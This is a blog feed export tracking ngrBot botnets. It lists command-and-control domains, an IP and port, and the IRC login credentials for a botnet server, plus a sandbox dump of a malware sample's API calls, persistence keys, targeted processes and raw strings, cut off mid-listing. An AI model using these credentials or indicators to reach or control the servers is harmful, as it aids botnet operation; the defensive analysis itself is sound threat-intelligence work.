<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2690706005301967154</id><updated>2012-02-02T18:25:26.197+01:00</updated><category term='vOlk HTTP Botnet - [+]Pharming ★ [ver 4.0]'/><category term='linux'/><category term='SpyEye Plugins'/><category term='Virus.Win32.Nimnul.a'/><category term='142mb malware samples'/><category term='ngrBot'/><category term='ragebot'/><category term='hf heckers'/><category term='malware samples'/><category term='Ganja'/><category term='P2P-Worm.Win32.BlackControl'/><category term='Trojan.Win32.Bredolab'/><category term='Trojan-PWS.Banker5'/><category term='lulznet'/><category term='template'/><category term='TsGh'/><category term='GodBot'/><category term='ColdSeal 5.4.1 Ultimate Release--FWB++ CRACKED'/><category term='hbot'/><category term='iRooT bot'/><category term='darkirc'/><category term='Autumn Bot'/><category term='Sharktech'/><category term='SASL'/><category term='nazel'/><category term='ngrBot 1.0.3 Manual'/><category term='Trojan Ransom (WinLock)'/><category term='Z3R0x'/><category term='Zeus'/><category term='ngrBot Commands'/><category term='Silent Bitcoin'/><category term='Bitcoin Miner  Botnet'/><category term='plague'/><category term='SpyEye Loader v1.3.41'/><category term='SpyEye1.3.45 pwned'/><category term='Aryan Bot Commands'/><category term='xp'/><category term='vietnam hosting'/><category term='AryaN bot'/><category term='winlocker'/><title type='text'>Honeypots</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default?start-index=101&amp;max-results=100'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>1884</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7073499248031369715</id><published>2012-02-02T18:25:00.000+01:00</published><updated>2012-02-02T18:25:26.203+01:00</updated><title type='text'>c4t3ring.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)</title><content type='html'>Domains used to control bots:&lt;br /&gt;&lt;br /&gt;pedoapestoso.info not active &lt;br /&gt;c4t3ring.info&lt;br /&gt;ramen4all.info&lt;br /&gt;&lt;br /&gt;Resolved : [c4t3ring.info] To [74.62.152.211]&lt;br /&gt;Resolved : [ramen4all.info] To [74.62.152.211]&lt;br /&gt;&lt;br /&gt;c4t3ring.info:6161 Botnet server here&lt;br /&gt;ramen4all.info:6161 Botnet server here&lt;br /&gt;&lt;br /&gt;Clients: I have 247 clients and 0 servers&lt;br /&gt;Local users: Current Local Users: 247 Max: 1261&lt;br /&gt;Global users: Current Global Users: 247 Max: 280&lt;br /&gt;&lt;br /&gt;PASS p3p1n0&lt;br /&gt;NICK n{USA|XPa}skhiyla&lt;br /&gt;USER skhiyla 0 0 :skhiyla&lt;br /&gt;JOIN #bugs p3p1n1&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/74.62.152.211&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7073499248031369715?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7073499248031369715/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/02/c4t3ringinfongrbot-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7073499248031369715'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7073499248031369715'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/02/c4t3ringinfongrbot-hosted-in-united.html' title='c4t3ring.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4916922528997001143</id><published>2012-02-01T22:18:00.002+01:00</published><updated>2012-02-02T00:10:28.601+01:00</updated><title type='text'>rlz1lola.info(ngrBot hosted in Germany Hetzner Online Ag)</title><content type='html'>Large ngrBot server hosted in Germany&lt;br /&gt;Here u have strings from 2 executable samples&lt;br /&gt;&lt;br /&gt;30upjmrlzz.exe&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;Processes:&lt;br /&gt;PID    ParentPID    User    Path    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;2872    1236        C:\Documents and Settings\Mes documents\30upjmrlzz.exe    &lt;br /&gt;&lt;br /&gt;Ports:&lt;br /&gt;Port    PID    Type    Path    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Explorer Dlls:&lt;br /&gt;DLL Path    Company Name    File Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;No changes Found            &lt;br /&gt;&lt;br /&gt;IE Dlls:&lt;br /&gt;DLL Path    Company Name    File Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;No changes Found            &lt;br /&gt;&lt;br /&gt;Loaded Drivers:&lt;br /&gt;Driver File    Company Name    Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Monitored RegKeys&lt;br /&gt;Registry Key    Value    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Kernel31 Api Log&lt;br /&gt;    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;***** Installing Hooks *****    &lt;br /&gt;719f74df     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)    &lt;br /&gt;719f80c4     RegOpenKeyExA (Protocol_Catalog9)    &lt;br /&gt;719f777e     RegOpenKeyExA (00000095)    &lt;br /&gt;719f764d     RegOpenKeyExA (Catalog_Entries)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000001)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000002)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000003)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000004)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000005)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000006)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000007)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000008)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000009)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000010)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000011)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000012)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000013)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000014)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000015)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000016)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000017)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000018)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000019)    &lt;br /&gt;719f2623     WaitForSingleObject(77c,0)    &lt;br /&gt;719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    &lt;br /&gt;719f777e     RegOpenKeyExA (00000039)    &lt;br /&gt;719f835b     RegOpenKeyExA (Catalog_Entries)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000001)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000002)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000003)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000004)    &lt;br /&gt;719f2623     WaitForSingleObject(774,0)    &lt;br /&gt;719e1af2     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)    &lt;br /&gt;719e198e     GlobalAlloc()    &lt;br /&gt;7c80b72f     ExitThread()    &lt;br /&gt;7d2454bb     LoadLibraryA(KERNEL32.DLL)=7c800000    &lt;br /&gt;7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    &lt;br /&gt;73371c38     GetCommandLineA()    &lt;br /&gt;73372f57     CreateMutex((null))    &lt;br /&gt;7d23eab5     WaitForSingleObject(764,7530)    &lt;br /&gt;410de8     LoadLibraryA(KERNEL32.DLL)=7c800000    &lt;br /&gt;410de8     LoadLibraryA(MSVBVM60.DLL )=73370000    &lt;br /&gt;733739f4     GetCommandLineA()    &lt;br /&gt;7338d1b3     LoadLibraryA(C:\WINDOWS\system32\VB6FR.DLL)=0    &lt;br /&gt;7337452c     GetVersionExA()    &lt;br /&gt;7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    &lt;br /&gt;772370b9     GetVersionExA()    &lt;br /&gt;7723711c     GetCommandLineA()    &lt;br /&gt;7337476c     LoadLibraryA(SXS.DLL)=77210000    &lt;br /&gt;774efa66     LoadLibraryA(oleaut32.dll)=770e0000    &lt;br /&gt;73376792     RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)    &lt;br /&gt;77daeff6     RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)    &lt;br /&gt;770fc957     LoadLibraryA(C:\WINDOWS\system32\kernel32.dll)=7c800000    &lt;br /&gt;7337a15b     LoadLibraryA(kernel32.dll)=7c800000    &lt;br /&gt;406f1e     LoadLibraryA(kernel32)=7c800000    &lt;br /&gt;7337a15b     LoadLibraryA(kernel32)=7c800000    &lt;br /&gt;7337a15b     LoadLibraryA(USER32)=7e390000    &lt;br /&gt;7345d09c     CreateFileA(C:\Documents and Settings\Mes documents\30upjmrlzz.exe)    &lt;br /&gt;7345d34f     ReadFile()    &lt;br /&gt;406f1e     LoadLibraryA(NTDLL)=7c910000    &lt;br /&gt;7c8165b3     WaitForSingleObject(74c,64)    &lt;br /&gt;7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    &lt;br /&gt;7337a4c5     GetCurrentProcessId()=1236    &lt;br /&gt;7337bdfa     RegOpenKeyExA (HKLM\Software\Microsoft\Windows)    &lt;br /&gt;7337be1c     RegOpenKeyExA (HTML Help)    &lt;br /&gt;7337be1c     RegOpenKeyExA (Help)    &lt;br /&gt;7337c9ce     WaitForSingleObject(7e4,ffffffff)    &lt;br /&gt;73373657     ExitProcess()    &lt;br /&gt;***** Injected Process Terminated *****    &lt;br /&gt;&lt;br /&gt;DirwatchData&lt;br /&gt;    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;WatchDir Initilized OK    &lt;br /&gt;Watching C:\DOCUME~1\LOCALS~1\Temp    &lt;br /&gt;Watching C:\WINDOWS    &lt;br /&gt;Watching C:\Program Files    &lt;br /&gt;Created: C:\WINDOWS\Prefetch\30UPJMRLZZ.EXE-2CE4436A.pf    &lt;br /&gt;Modifed: C:\WINDOWS\Prefetch\30UPJMRLZZ.EXE-2CE4436A.pf    &lt;br /&gt;Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET501A.tmp    &lt;br /&gt;Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET2F.tmp    &lt;br /&gt;Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET2F.tmp    &lt;br /&gt;Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET501A.tmp    &lt;br /&gt;File: 30upjmrlzz.exe&lt;br /&gt;Size: 116236 Bytes&lt;br /&gt;MD5: AB7DDF19DE425E6439160DD343B391E1&lt;br /&gt;Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe&lt;br /&gt;&lt;br /&gt;File Properties: CompanyName      H3 7H&lt;br /&gt;FileDescription  &lt;br /&gt;FileVersion      43.34.0003&lt;br /&gt;InternalName     1&lt;br /&gt;LegalCopyright   &lt;br /&gt;OriginalFilename &lt;br /&gt;ProductName      4H37H&lt;br /&gt;ProductVersion   &lt;br /&gt;&lt;br /&gt;Exploit Signatures:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Scanning for 19 signatures&lt;br /&gt;Scan Complete: 312Kb in 0,031 seconds&lt;br /&gt;Urls&lt;br /&gt;--------------------------------------------------&lt;br /&gt;http://%s/%s&lt;br /&gt;http://%s/&lt;br /&gt;http://&lt;br /&gt;http://api.wipmania.com/ftp://%s:%s@%s:%d&lt;br /&gt;&lt;br /&gt;RegKeys&lt;br /&gt;--------------------------------------------------&lt;br /&gt;gdatasoftware.&lt;br /&gt;sunbeltsoftware.&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Policies\System&lt;br /&gt;.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;&lt;br /&gt;ExeRefs&lt;br /&gt;--------------------------------------------------&lt;br /&gt;File: 30upjmrlzz_dmp.exe_&lt;br /&gt;.exe&lt;br /&gt;%windir%\system32\cmd.exe&lt;br /&gt;&amp;amp;&amp;amp;%%windir%%\explorer.exe %%cd%%%s&lt;br /&gt;%0x.exe&lt;br /&gt;Internet Explorer\iexplore.exe&lt;br /&gt;pidgin.exe&lt;br /&gt;wlcomm.exe&lt;br /&gt;msnmsgr.exe&lt;br /&gt;msmsgs.exe&lt;br /&gt;opera.exe&lt;br /&gt;chrome.exe&lt;br /&gt;ieuser.exe&lt;br /&gt;iexplore.exe&lt;br /&gt;firefox.exe&lt;br /&gt;.ipconfig.exe&lt;br /&gt;verclsid.exe&lt;br /&gt;regedit.exe&lt;br /&gt;rundll32.exe&lt;br /&gt;cmd.exe&lt;br /&gt;regsvr32.exe&lt;br /&gt;.exe&lt;br /&gt;lol.exe&lt;br /&gt;winlogon.exe&lt;br /&gt;explorer.exe&lt;br /&gt;y%s\%s.exe&lt;br /&gt;lsass.exe&lt;br /&gt;&lt;br /&gt;Raw Strings:&lt;br /&gt;--------------------------------------------------&lt;br /&gt;File: 30upjmrlzz_dmp.exe_&lt;br /&gt;MD5:  20355b2f65c907536ac74b1c4cae1189&lt;br /&gt;Size: 319490&lt;br /&gt;&lt;br /&gt;Ascii Strings:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;!This program cannot be run in DOS mode.&lt;br /&gt;Rich:&lt;br /&gt;.text&lt;br /&gt;`.rdata&lt;br /&gt;@.data&lt;br /&gt;.reloc&lt;br /&gt;WPVS&lt;br /&gt;t1h(&lt;br /&gt;_[^]&lt;br /&gt;QRPWV&lt;br /&gt;RPQWV&lt;br /&gt;QRPSV&lt;br /&gt;txVhD&lt;br /&gt;uaVhD&lt;br /&gt;QRPSV&lt;br /&gt;SVW3&lt;br /&gt;u3h0&lt;br /&gt;u!h(&lt;br /&gt;u3h0&lt;br /&gt;PQRV&lt;br /&gt;RPQW&lt;br /&gt;u:WhD&lt;br /&gt;u#WhD&lt;br /&gt;QRPW&lt;br /&gt;RPQV&lt;br /&gt;RPQV&lt;br /&gt;PQRV&lt;br /&gt;RPQW&lt;br /&gt;RSSh&lt;br /&gt;vG9u&lt;br /&gt;t0WSV&lt;br /&gt;WVRj&lt;br /&gt;WSPQR&lt;br /&gt;vt9u&lt;br /&gt;t0WSV&lt;br /&gt;WVRj&lt;br /&gt;WSPQR&lt;br /&gt;gfff&lt;br /&gt;WVRj&lt;br /&gt;PWQR&lt;br /&gt;u3h0&lt;br /&gt;u!h(&lt;br /&gt;u3h0&lt;br /&gt;&amp;gt;CAL &lt;br /&gt;uGh4&lt;br /&gt;=MSG t&lt;br /&gt;=SDG &lt;br /&gt;&amp;gt;MSG u`&lt;br /&gt;SVW3&lt;br /&gt;SVW3&lt;br /&gt;9:vP&lt;br /&gt;G;9r&lt;br /&gt;@W;F&lt;br /&gt;Wj h&lt;br /&gt;t&amp;amp;j,j&lt;br /&gt;Wjdj&lt;br /&gt;F4VP&lt;br /&gt;SWf9&lt;br /&gt;t-f;&lt;br /&gt;t=hH&lt;br /&gt;_^[]&lt;br /&gt;=pzC&lt;br /&gt;&amp;#124;04+~4&lt;br /&gt;_^[]&lt;br /&gt;SVWP3&lt;br /&gt;QWSVR&lt;br /&gt;=lzC&lt;br /&gt;QPRWS&lt;br /&gt;RPQS&lt;br /&gt;WQRV&lt;br /&gt;_^[]&lt;br /&gt;_^[]&lt;br /&gt;un9F&lt;br /&gt;t2j h&lt;br /&gt;L9_@vI&lt;br /&gt;;_@r&lt;br /&gt;WVPQR&lt;br /&gt;SQRj&lt;br /&gt;STFU&lt;br /&gt;=pzC&lt;br /&gt;A8j@&lt;br /&gt;QWRPV&lt;br /&gt;B0QPV&lt;br /&gt;=4yA&lt;br /&gt;PQRj&lt;br /&gt;PQRj&lt;br /&gt;SVWh&lt;br /&gt;STFU&lt;br /&gt;Vh@P@&lt;br /&gt;L9^8vE&lt;br /&gt;;^8r&lt;br /&gt;=pzC&lt;br /&gt;hpP@&lt;br /&gt;STFU&lt;br /&gt;PL9^(v^&lt;br /&gt;9+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;;^(r&lt;br /&gt;9~0v/&lt;br /&gt;;~0r&lt;br /&gt;9^8v;&lt;br /&gt;:+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;;^8r&lt;br /&gt;9^@v2&lt;br /&gt;:+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;;^@r&lt;br /&gt;tu9]&lt;br /&gt;RVWPQ&lt;br /&gt;uXWV&lt;br /&gt;QVWRP&lt;br /&gt;u$WP&lt;br /&gt;E$_^[&lt;br /&gt;tpVW&lt;br /&gt;uTVW&lt;br /&gt;E$_^[&lt;br /&gt;E$^[&lt;br /&gt;E$_^[&lt;br /&gt;j&amp;amp;hx&lt;br /&gt;t}hP&lt;br /&gt;QVWh&lt;br /&gt;95hVA&lt;br /&gt;QVht&lt;br /&gt;8POST&lt;br /&gt;tWWV&lt;br /&gt;PQWj&lt;br /&gt;RPQVW&lt;br /&gt;RPQVW&lt;br /&gt;WVRPS&lt;br /&gt;u h(&lt;br /&gt;QWRS&lt;br /&gt;SVWh&lt;br /&gt;SVW3&lt;br /&gt;95PWA&lt;br /&gt;;5PWA&lt;br /&gt;95PWA&lt;br /&gt;;5PWA&lt;br /&gt;VWQh4&lt;br /&gt;t&amp;quot;j V&lt;br /&gt;SVWh&lt;br /&gt;=USERt&lt;br /&gt;=PASS&lt;br /&gt;:Uu#Vh&lt;br /&gt;8Pu.&lt;br /&gt;=FEATt&lt;br /&gt;=TYPEt&lt;br /&gt;=PASVu&lt;br /&gt;=STATt&lt;br /&gt;=LISTu&lt;br /&gt;uuhh&lt;br /&gt;ucWVh&lt;br /&gt;RPQh&lt;br /&gt;PQRh&lt;br /&gt;QRPh&lt;br /&gt;QVh:&lt;br /&gt;Rh~f&lt;br /&gt;_[^]&lt;br /&gt;_[^]&lt;br /&gt;F/PQ&lt;br /&gt;~(WR&lt;br /&gt;T0(RW&lt;br /&gt;t=VW&lt;br /&gt;Qh~f&lt;br /&gt;u4SV&lt;br /&gt;W$RP&lt;br /&gt;tmQh&lt;br /&gt;RSSh&lt;br /&gt;t,PVQ&lt;br /&gt;O,@PQ&lt;br /&gt;TSVW3&lt;br /&gt;WWWWh&lt;br /&gt;F4RP&lt;br /&gt;LSVW3&lt;br /&gt;^&amp;lt;^[&lt;br /&gt;V4QR&lt;br /&gt;vJ9^,u&lt;br /&gt;;F8v&lt;br /&gt;N4PQ&lt;br /&gt;F4RP&lt;br /&gt;F@@PR&lt;br /&gt;F,BRP&lt;br /&gt;u-SSV&lt;br /&gt;RSWWj&lt;br /&gt;8httpu1&lt;br /&gt;u$8H&lt;br /&gt;QRVP&lt;br /&gt;RVPQ&lt;br /&gt;QRVP&lt;br /&gt;RVPQ&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;Qh~f&lt;br /&gt;SVWP&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;Rh~f&lt;br /&gt;hh)A&lt;br /&gt;h`)A&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;tlWP&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;tlWP&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;Rh~f&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;_^[]&lt;br /&gt;h0^A&lt;br /&gt;hh^A&lt;br /&gt;SVWj&lt;br /&gt;_^Yj&lt;br /&gt;QPPPPh&lt;br /&gt;h(*A&lt;br /&gt;SVWj,&lt;br /&gt;Vj\P&lt;br /&gt;[@^]&lt;br /&gt;Vj.P&lt;br /&gt;[@^]&lt;br /&gt;QRRj&lt;br /&gt;RRRRf&lt;br /&gt;[_^]&lt;br /&gt;SVWh&lt;br /&gt;h0*A&lt;br /&gt;*t2:&lt;br /&gt;VhH*A&lt;br /&gt;Qh4*A&lt;br /&gt;QSV3&lt;br /&gt;j PhxWA&lt;br /&gt;h`*A&lt;br /&gt;Vj#S&lt;br /&gt;_^[]&lt;br /&gt;Wj*P&lt;br /&gt;^[_]&lt;br /&gt;h0+A&lt;br /&gt;h$+A&lt;br /&gt;SVWh&lt;br /&gt;VVVV&lt;br /&gt;WWVS&lt;br /&gt;SVW3&lt;br /&gt;RVh-&lt;br /&gt;@PVj&lt;br /&gt;PVh-&lt;br /&gt;VhH+A&lt;br /&gt;SVW3&lt;br /&gt;@PVj&lt;br /&gt;RVj&amp;quot;W&lt;br /&gt;hT+A&lt;br /&gt;hT+A&lt;br /&gt;h&amp;#124;+A&lt;br /&gt;ht+A&lt;br /&gt;Rhh+A&lt;br /&gt;QhX+A&lt;br /&gt;@PVR&lt;br /&gt;Wj j+V&lt;br /&gt;&amp;lt;%u2&lt;br /&gt;VVVV&lt;br /&gt;SVWh&lt;br /&gt;QRPu&lt;br /&gt;PQRu&lt;br /&gt;h ,A&lt;br /&gt;QRhL]A&lt;br /&gt;PhT\A&lt;br /&gt;Ph$]A&lt;br /&gt;9Q@w&lt;br /&gt;RRhh&lt;br /&gt;h`]A&lt;br /&gt;h`]A&lt;br /&gt;h`]A&lt;br /&gt;h`]A&lt;br /&gt;Ph0]A&lt;br /&gt;8nu8h&lt;br /&gt;Rh0]A&lt;br /&gt;Qh0]A&lt;br /&gt;Rh0]A&lt;br /&gt;Ph@]A&lt;br /&gt;8nu8h&lt;br /&gt;Rh@]A&lt;br /&gt;Qh@]A&lt;br /&gt;Rh@]A&lt;br /&gt;htXA&lt;br /&gt;h@XA&lt;br /&gt;PVRQhT`A&lt;br /&gt;PQRVh&lt;br /&gt;RQPhT`A&lt;br /&gt;PQRSh&lt;br /&gt;8_^[&lt;br /&gt;hPXA&lt;br /&gt;h\XA&lt;br /&gt;hHXA&lt;br /&gt;Rh0]A&lt;br /&gt;Rh0]A&lt;br /&gt;Rh@]A&lt;br /&gt;Qh@]A&lt;br /&gt;h&amp;#124;,A&lt;br /&gt;h&amp;#124;,A&lt;br /&gt;hx,A&lt;br /&gt;QhP_A&lt;br /&gt;Qh&amp;#124;_A&lt;br /&gt;hx,A&lt;br /&gt;h(XA&lt;br /&gt;hp,A&lt;br /&gt;hd,A&lt;br /&gt;h8XA&lt;br /&gt;8httpuM&lt;br /&gt;8:uE&lt;br /&gt;u&amp;gt;8P&lt;br /&gt;PhD,A&lt;br /&gt;$_^[&lt;br /&gt;Qh@`A&lt;br /&gt; _^[&lt;br /&gt;h@,A&lt;br /&gt;h(`A&lt;br /&gt;h&amp;#124;bA&lt;br /&gt;QRPh4,A&lt;br /&gt;h`XA&lt;br /&gt;h4XA&lt;br /&gt;hXXA&lt;br /&gt;hpXA&lt;br /&gt;QRPh4,A&lt;br /&gt;hhXA&lt;br /&gt;RPQh4,A&lt;br /&gt;SVWh&lt;br /&gt;8#t&amp;quot;&lt;br /&gt;RVWP&lt;br /&gt;SVWR&lt;br /&gt;hx,A&lt;br /&gt;hx,A&lt;br /&gt;hx]A&lt;br /&gt;Qhl]A&lt;br /&gt;PQh0]A&lt;br /&gt;u(hl&lt;br /&gt;Ph$]A&lt;br /&gt;QRh0]A&lt;br /&gt;SVW3&lt;br /&gt;h -A&lt;br /&gt;t&amp;quot;h&amp;lt;-A&lt;br /&gt;t&amp;quot;h0-A&lt;br /&gt;u5h(-A&lt;br /&gt;Vh$cA&lt;br /&gt;VhDcA&lt;br /&gt;VhdcA&lt;br /&gt;VhpcA&lt;br /&gt;t)h0u&lt;br /&gt;SVW3&lt;br /&gt;RPhD-A&lt;br /&gt;QRPh&lt;br /&gt;QRPh&lt;br /&gt;PQRhTaA&lt;br /&gt;PQhDbA&lt;br /&gt;PRh(aA&lt;br /&gt;QRPh&lt;br /&gt;SVW3&lt;br /&gt;tRh&amp;#124;,A&lt;br /&gt;uBPh&lt;br /&gt;h`]A&lt;br /&gt;h -A&lt;br /&gt;PWQRh&lt;br /&gt;SPQh&lt;br /&gt;PSRhTaA&lt;br /&gt;PhTaA&lt;br /&gt;PRhDbA&lt;br /&gt;Ph(aA&lt;br /&gt;hx,A&lt;br /&gt;tqCh&lt;br /&gt;s[h5&lt;br /&gt;ht.A&lt;br /&gt;SWhl.A&lt;br /&gt;hd.A&lt;br /&gt;t'j j&lt;br /&gt;h&amp;lt;.A&lt;br /&gt;h46A&lt;br /&gt;SVWh&lt;br /&gt;hx,A&lt;br /&gt;Rh$6A&lt;br /&gt;h\/A&lt;br /&gt;h\/A&lt;br /&gt;tb@Ph&lt;br /&gt;Rhd/A&lt;br /&gt;;&amp;lt; t&lt;br /&gt;SVW3&lt;br /&gt;Wh00A&lt;br /&gt;h 0A&lt;br /&gt;5$iA&lt;br /&gt;50iA&lt;br /&gt;5&amp;lt;iA&lt;br /&gt;5HiA&lt;br /&gt;5TiA&lt;br /&gt;5`iA&lt;br /&gt;5liA&lt;br /&gt;95$iA&lt;br /&gt;6 iA&lt;br /&gt;taVW&lt;br /&gt;h@0A&lt;br /&gt;hD0A&lt;br /&gt;Ph&amp;lt;_A&lt;br /&gt;&amp;#124;Sj 3&lt;br /&gt;tlSSSSSSSSSShL0A&lt;br /&gt;Phd0A&lt;br /&gt;tU&amp;lt; u&lt;br /&gt;u2Wh&lt;br /&gt;h(3A&lt;br /&gt;hT+A&lt;br /&gt;hT+A&lt;br /&gt;SVWh&lt;br /&gt;hT+A&lt;br /&gt;h,3A&lt;br /&gt;u.h,3A&lt;br /&gt;SVWh&lt;br /&gt;RhP3A&lt;br /&gt;PVQR&lt;br /&gt;h@3A&lt;br /&gt;;SDG &lt;br /&gt;8SDG &lt;br /&gt;h,3A&lt;br /&gt;Qhx3A&lt;br /&gt;RPhl3A&lt;br /&gt;QRhT3A&lt;br /&gt;t!WV&lt;br /&gt;_^[]&lt;br /&gt;hl.A&lt;br /&gt;hd.A&lt;br /&gt;hl.A&lt;br /&gt;hd.A&lt;br /&gt;h(mA&lt;br /&gt;h(5A&lt;br /&gt;t!h85A&lt;br /&gt;_^t)&lt;br /&gt;9&amp;#124;:~&lt;br /&gt;:~+w:~&lt;br /&gt;tK@boL@&lt;br /&gt;L@iBK@&lt;br /&gt;%s.%s&lt;br /&gt;pdef&lt;br /&gt;%s.%S&lt;br /&gt;%s.Blocked &amp;quot;%s&amp;quot; from removing our bot file!&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from removing our bot file!&lt;br /&gt;block&lt;br /&gt;bdns&lt;br /&gt;CreateFileW&lt;br /&gt;0123456789ABCDEF&lt;br /&gt;i.root-servers.org&lt;br /&gt;%s.Blocked &amp;quot;%s&amp;quot; from moving our bot file&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from moving our bot file&lt;br /&gt;%s.p10-&amp;gt; Message hijacked!&lt;br /&gt;%s.p10-&amp;gt; Message to %s hijacked!&lt;br /&gt;%s.p21-&amp;gt; Message hijacked!&lt;br /&gt;msnmsg&lt;br /&gt;msnint&lt;br /&gt;baddr&lt;br /&gt;X-MMS-IM-Format:&lt;br /&gt;CAL %d %256s&lt;br /&gt;msnu&lt;br /&gt;Done frst&lt;br /&gt;ngr-&amp;gt;blocksize: %d&lt;br /&gt;block_size: %d&lt;br /&gt;NtFreeVirtualMemory&lt;br /&gt;NtAllocateVirtualMemory&lt;br 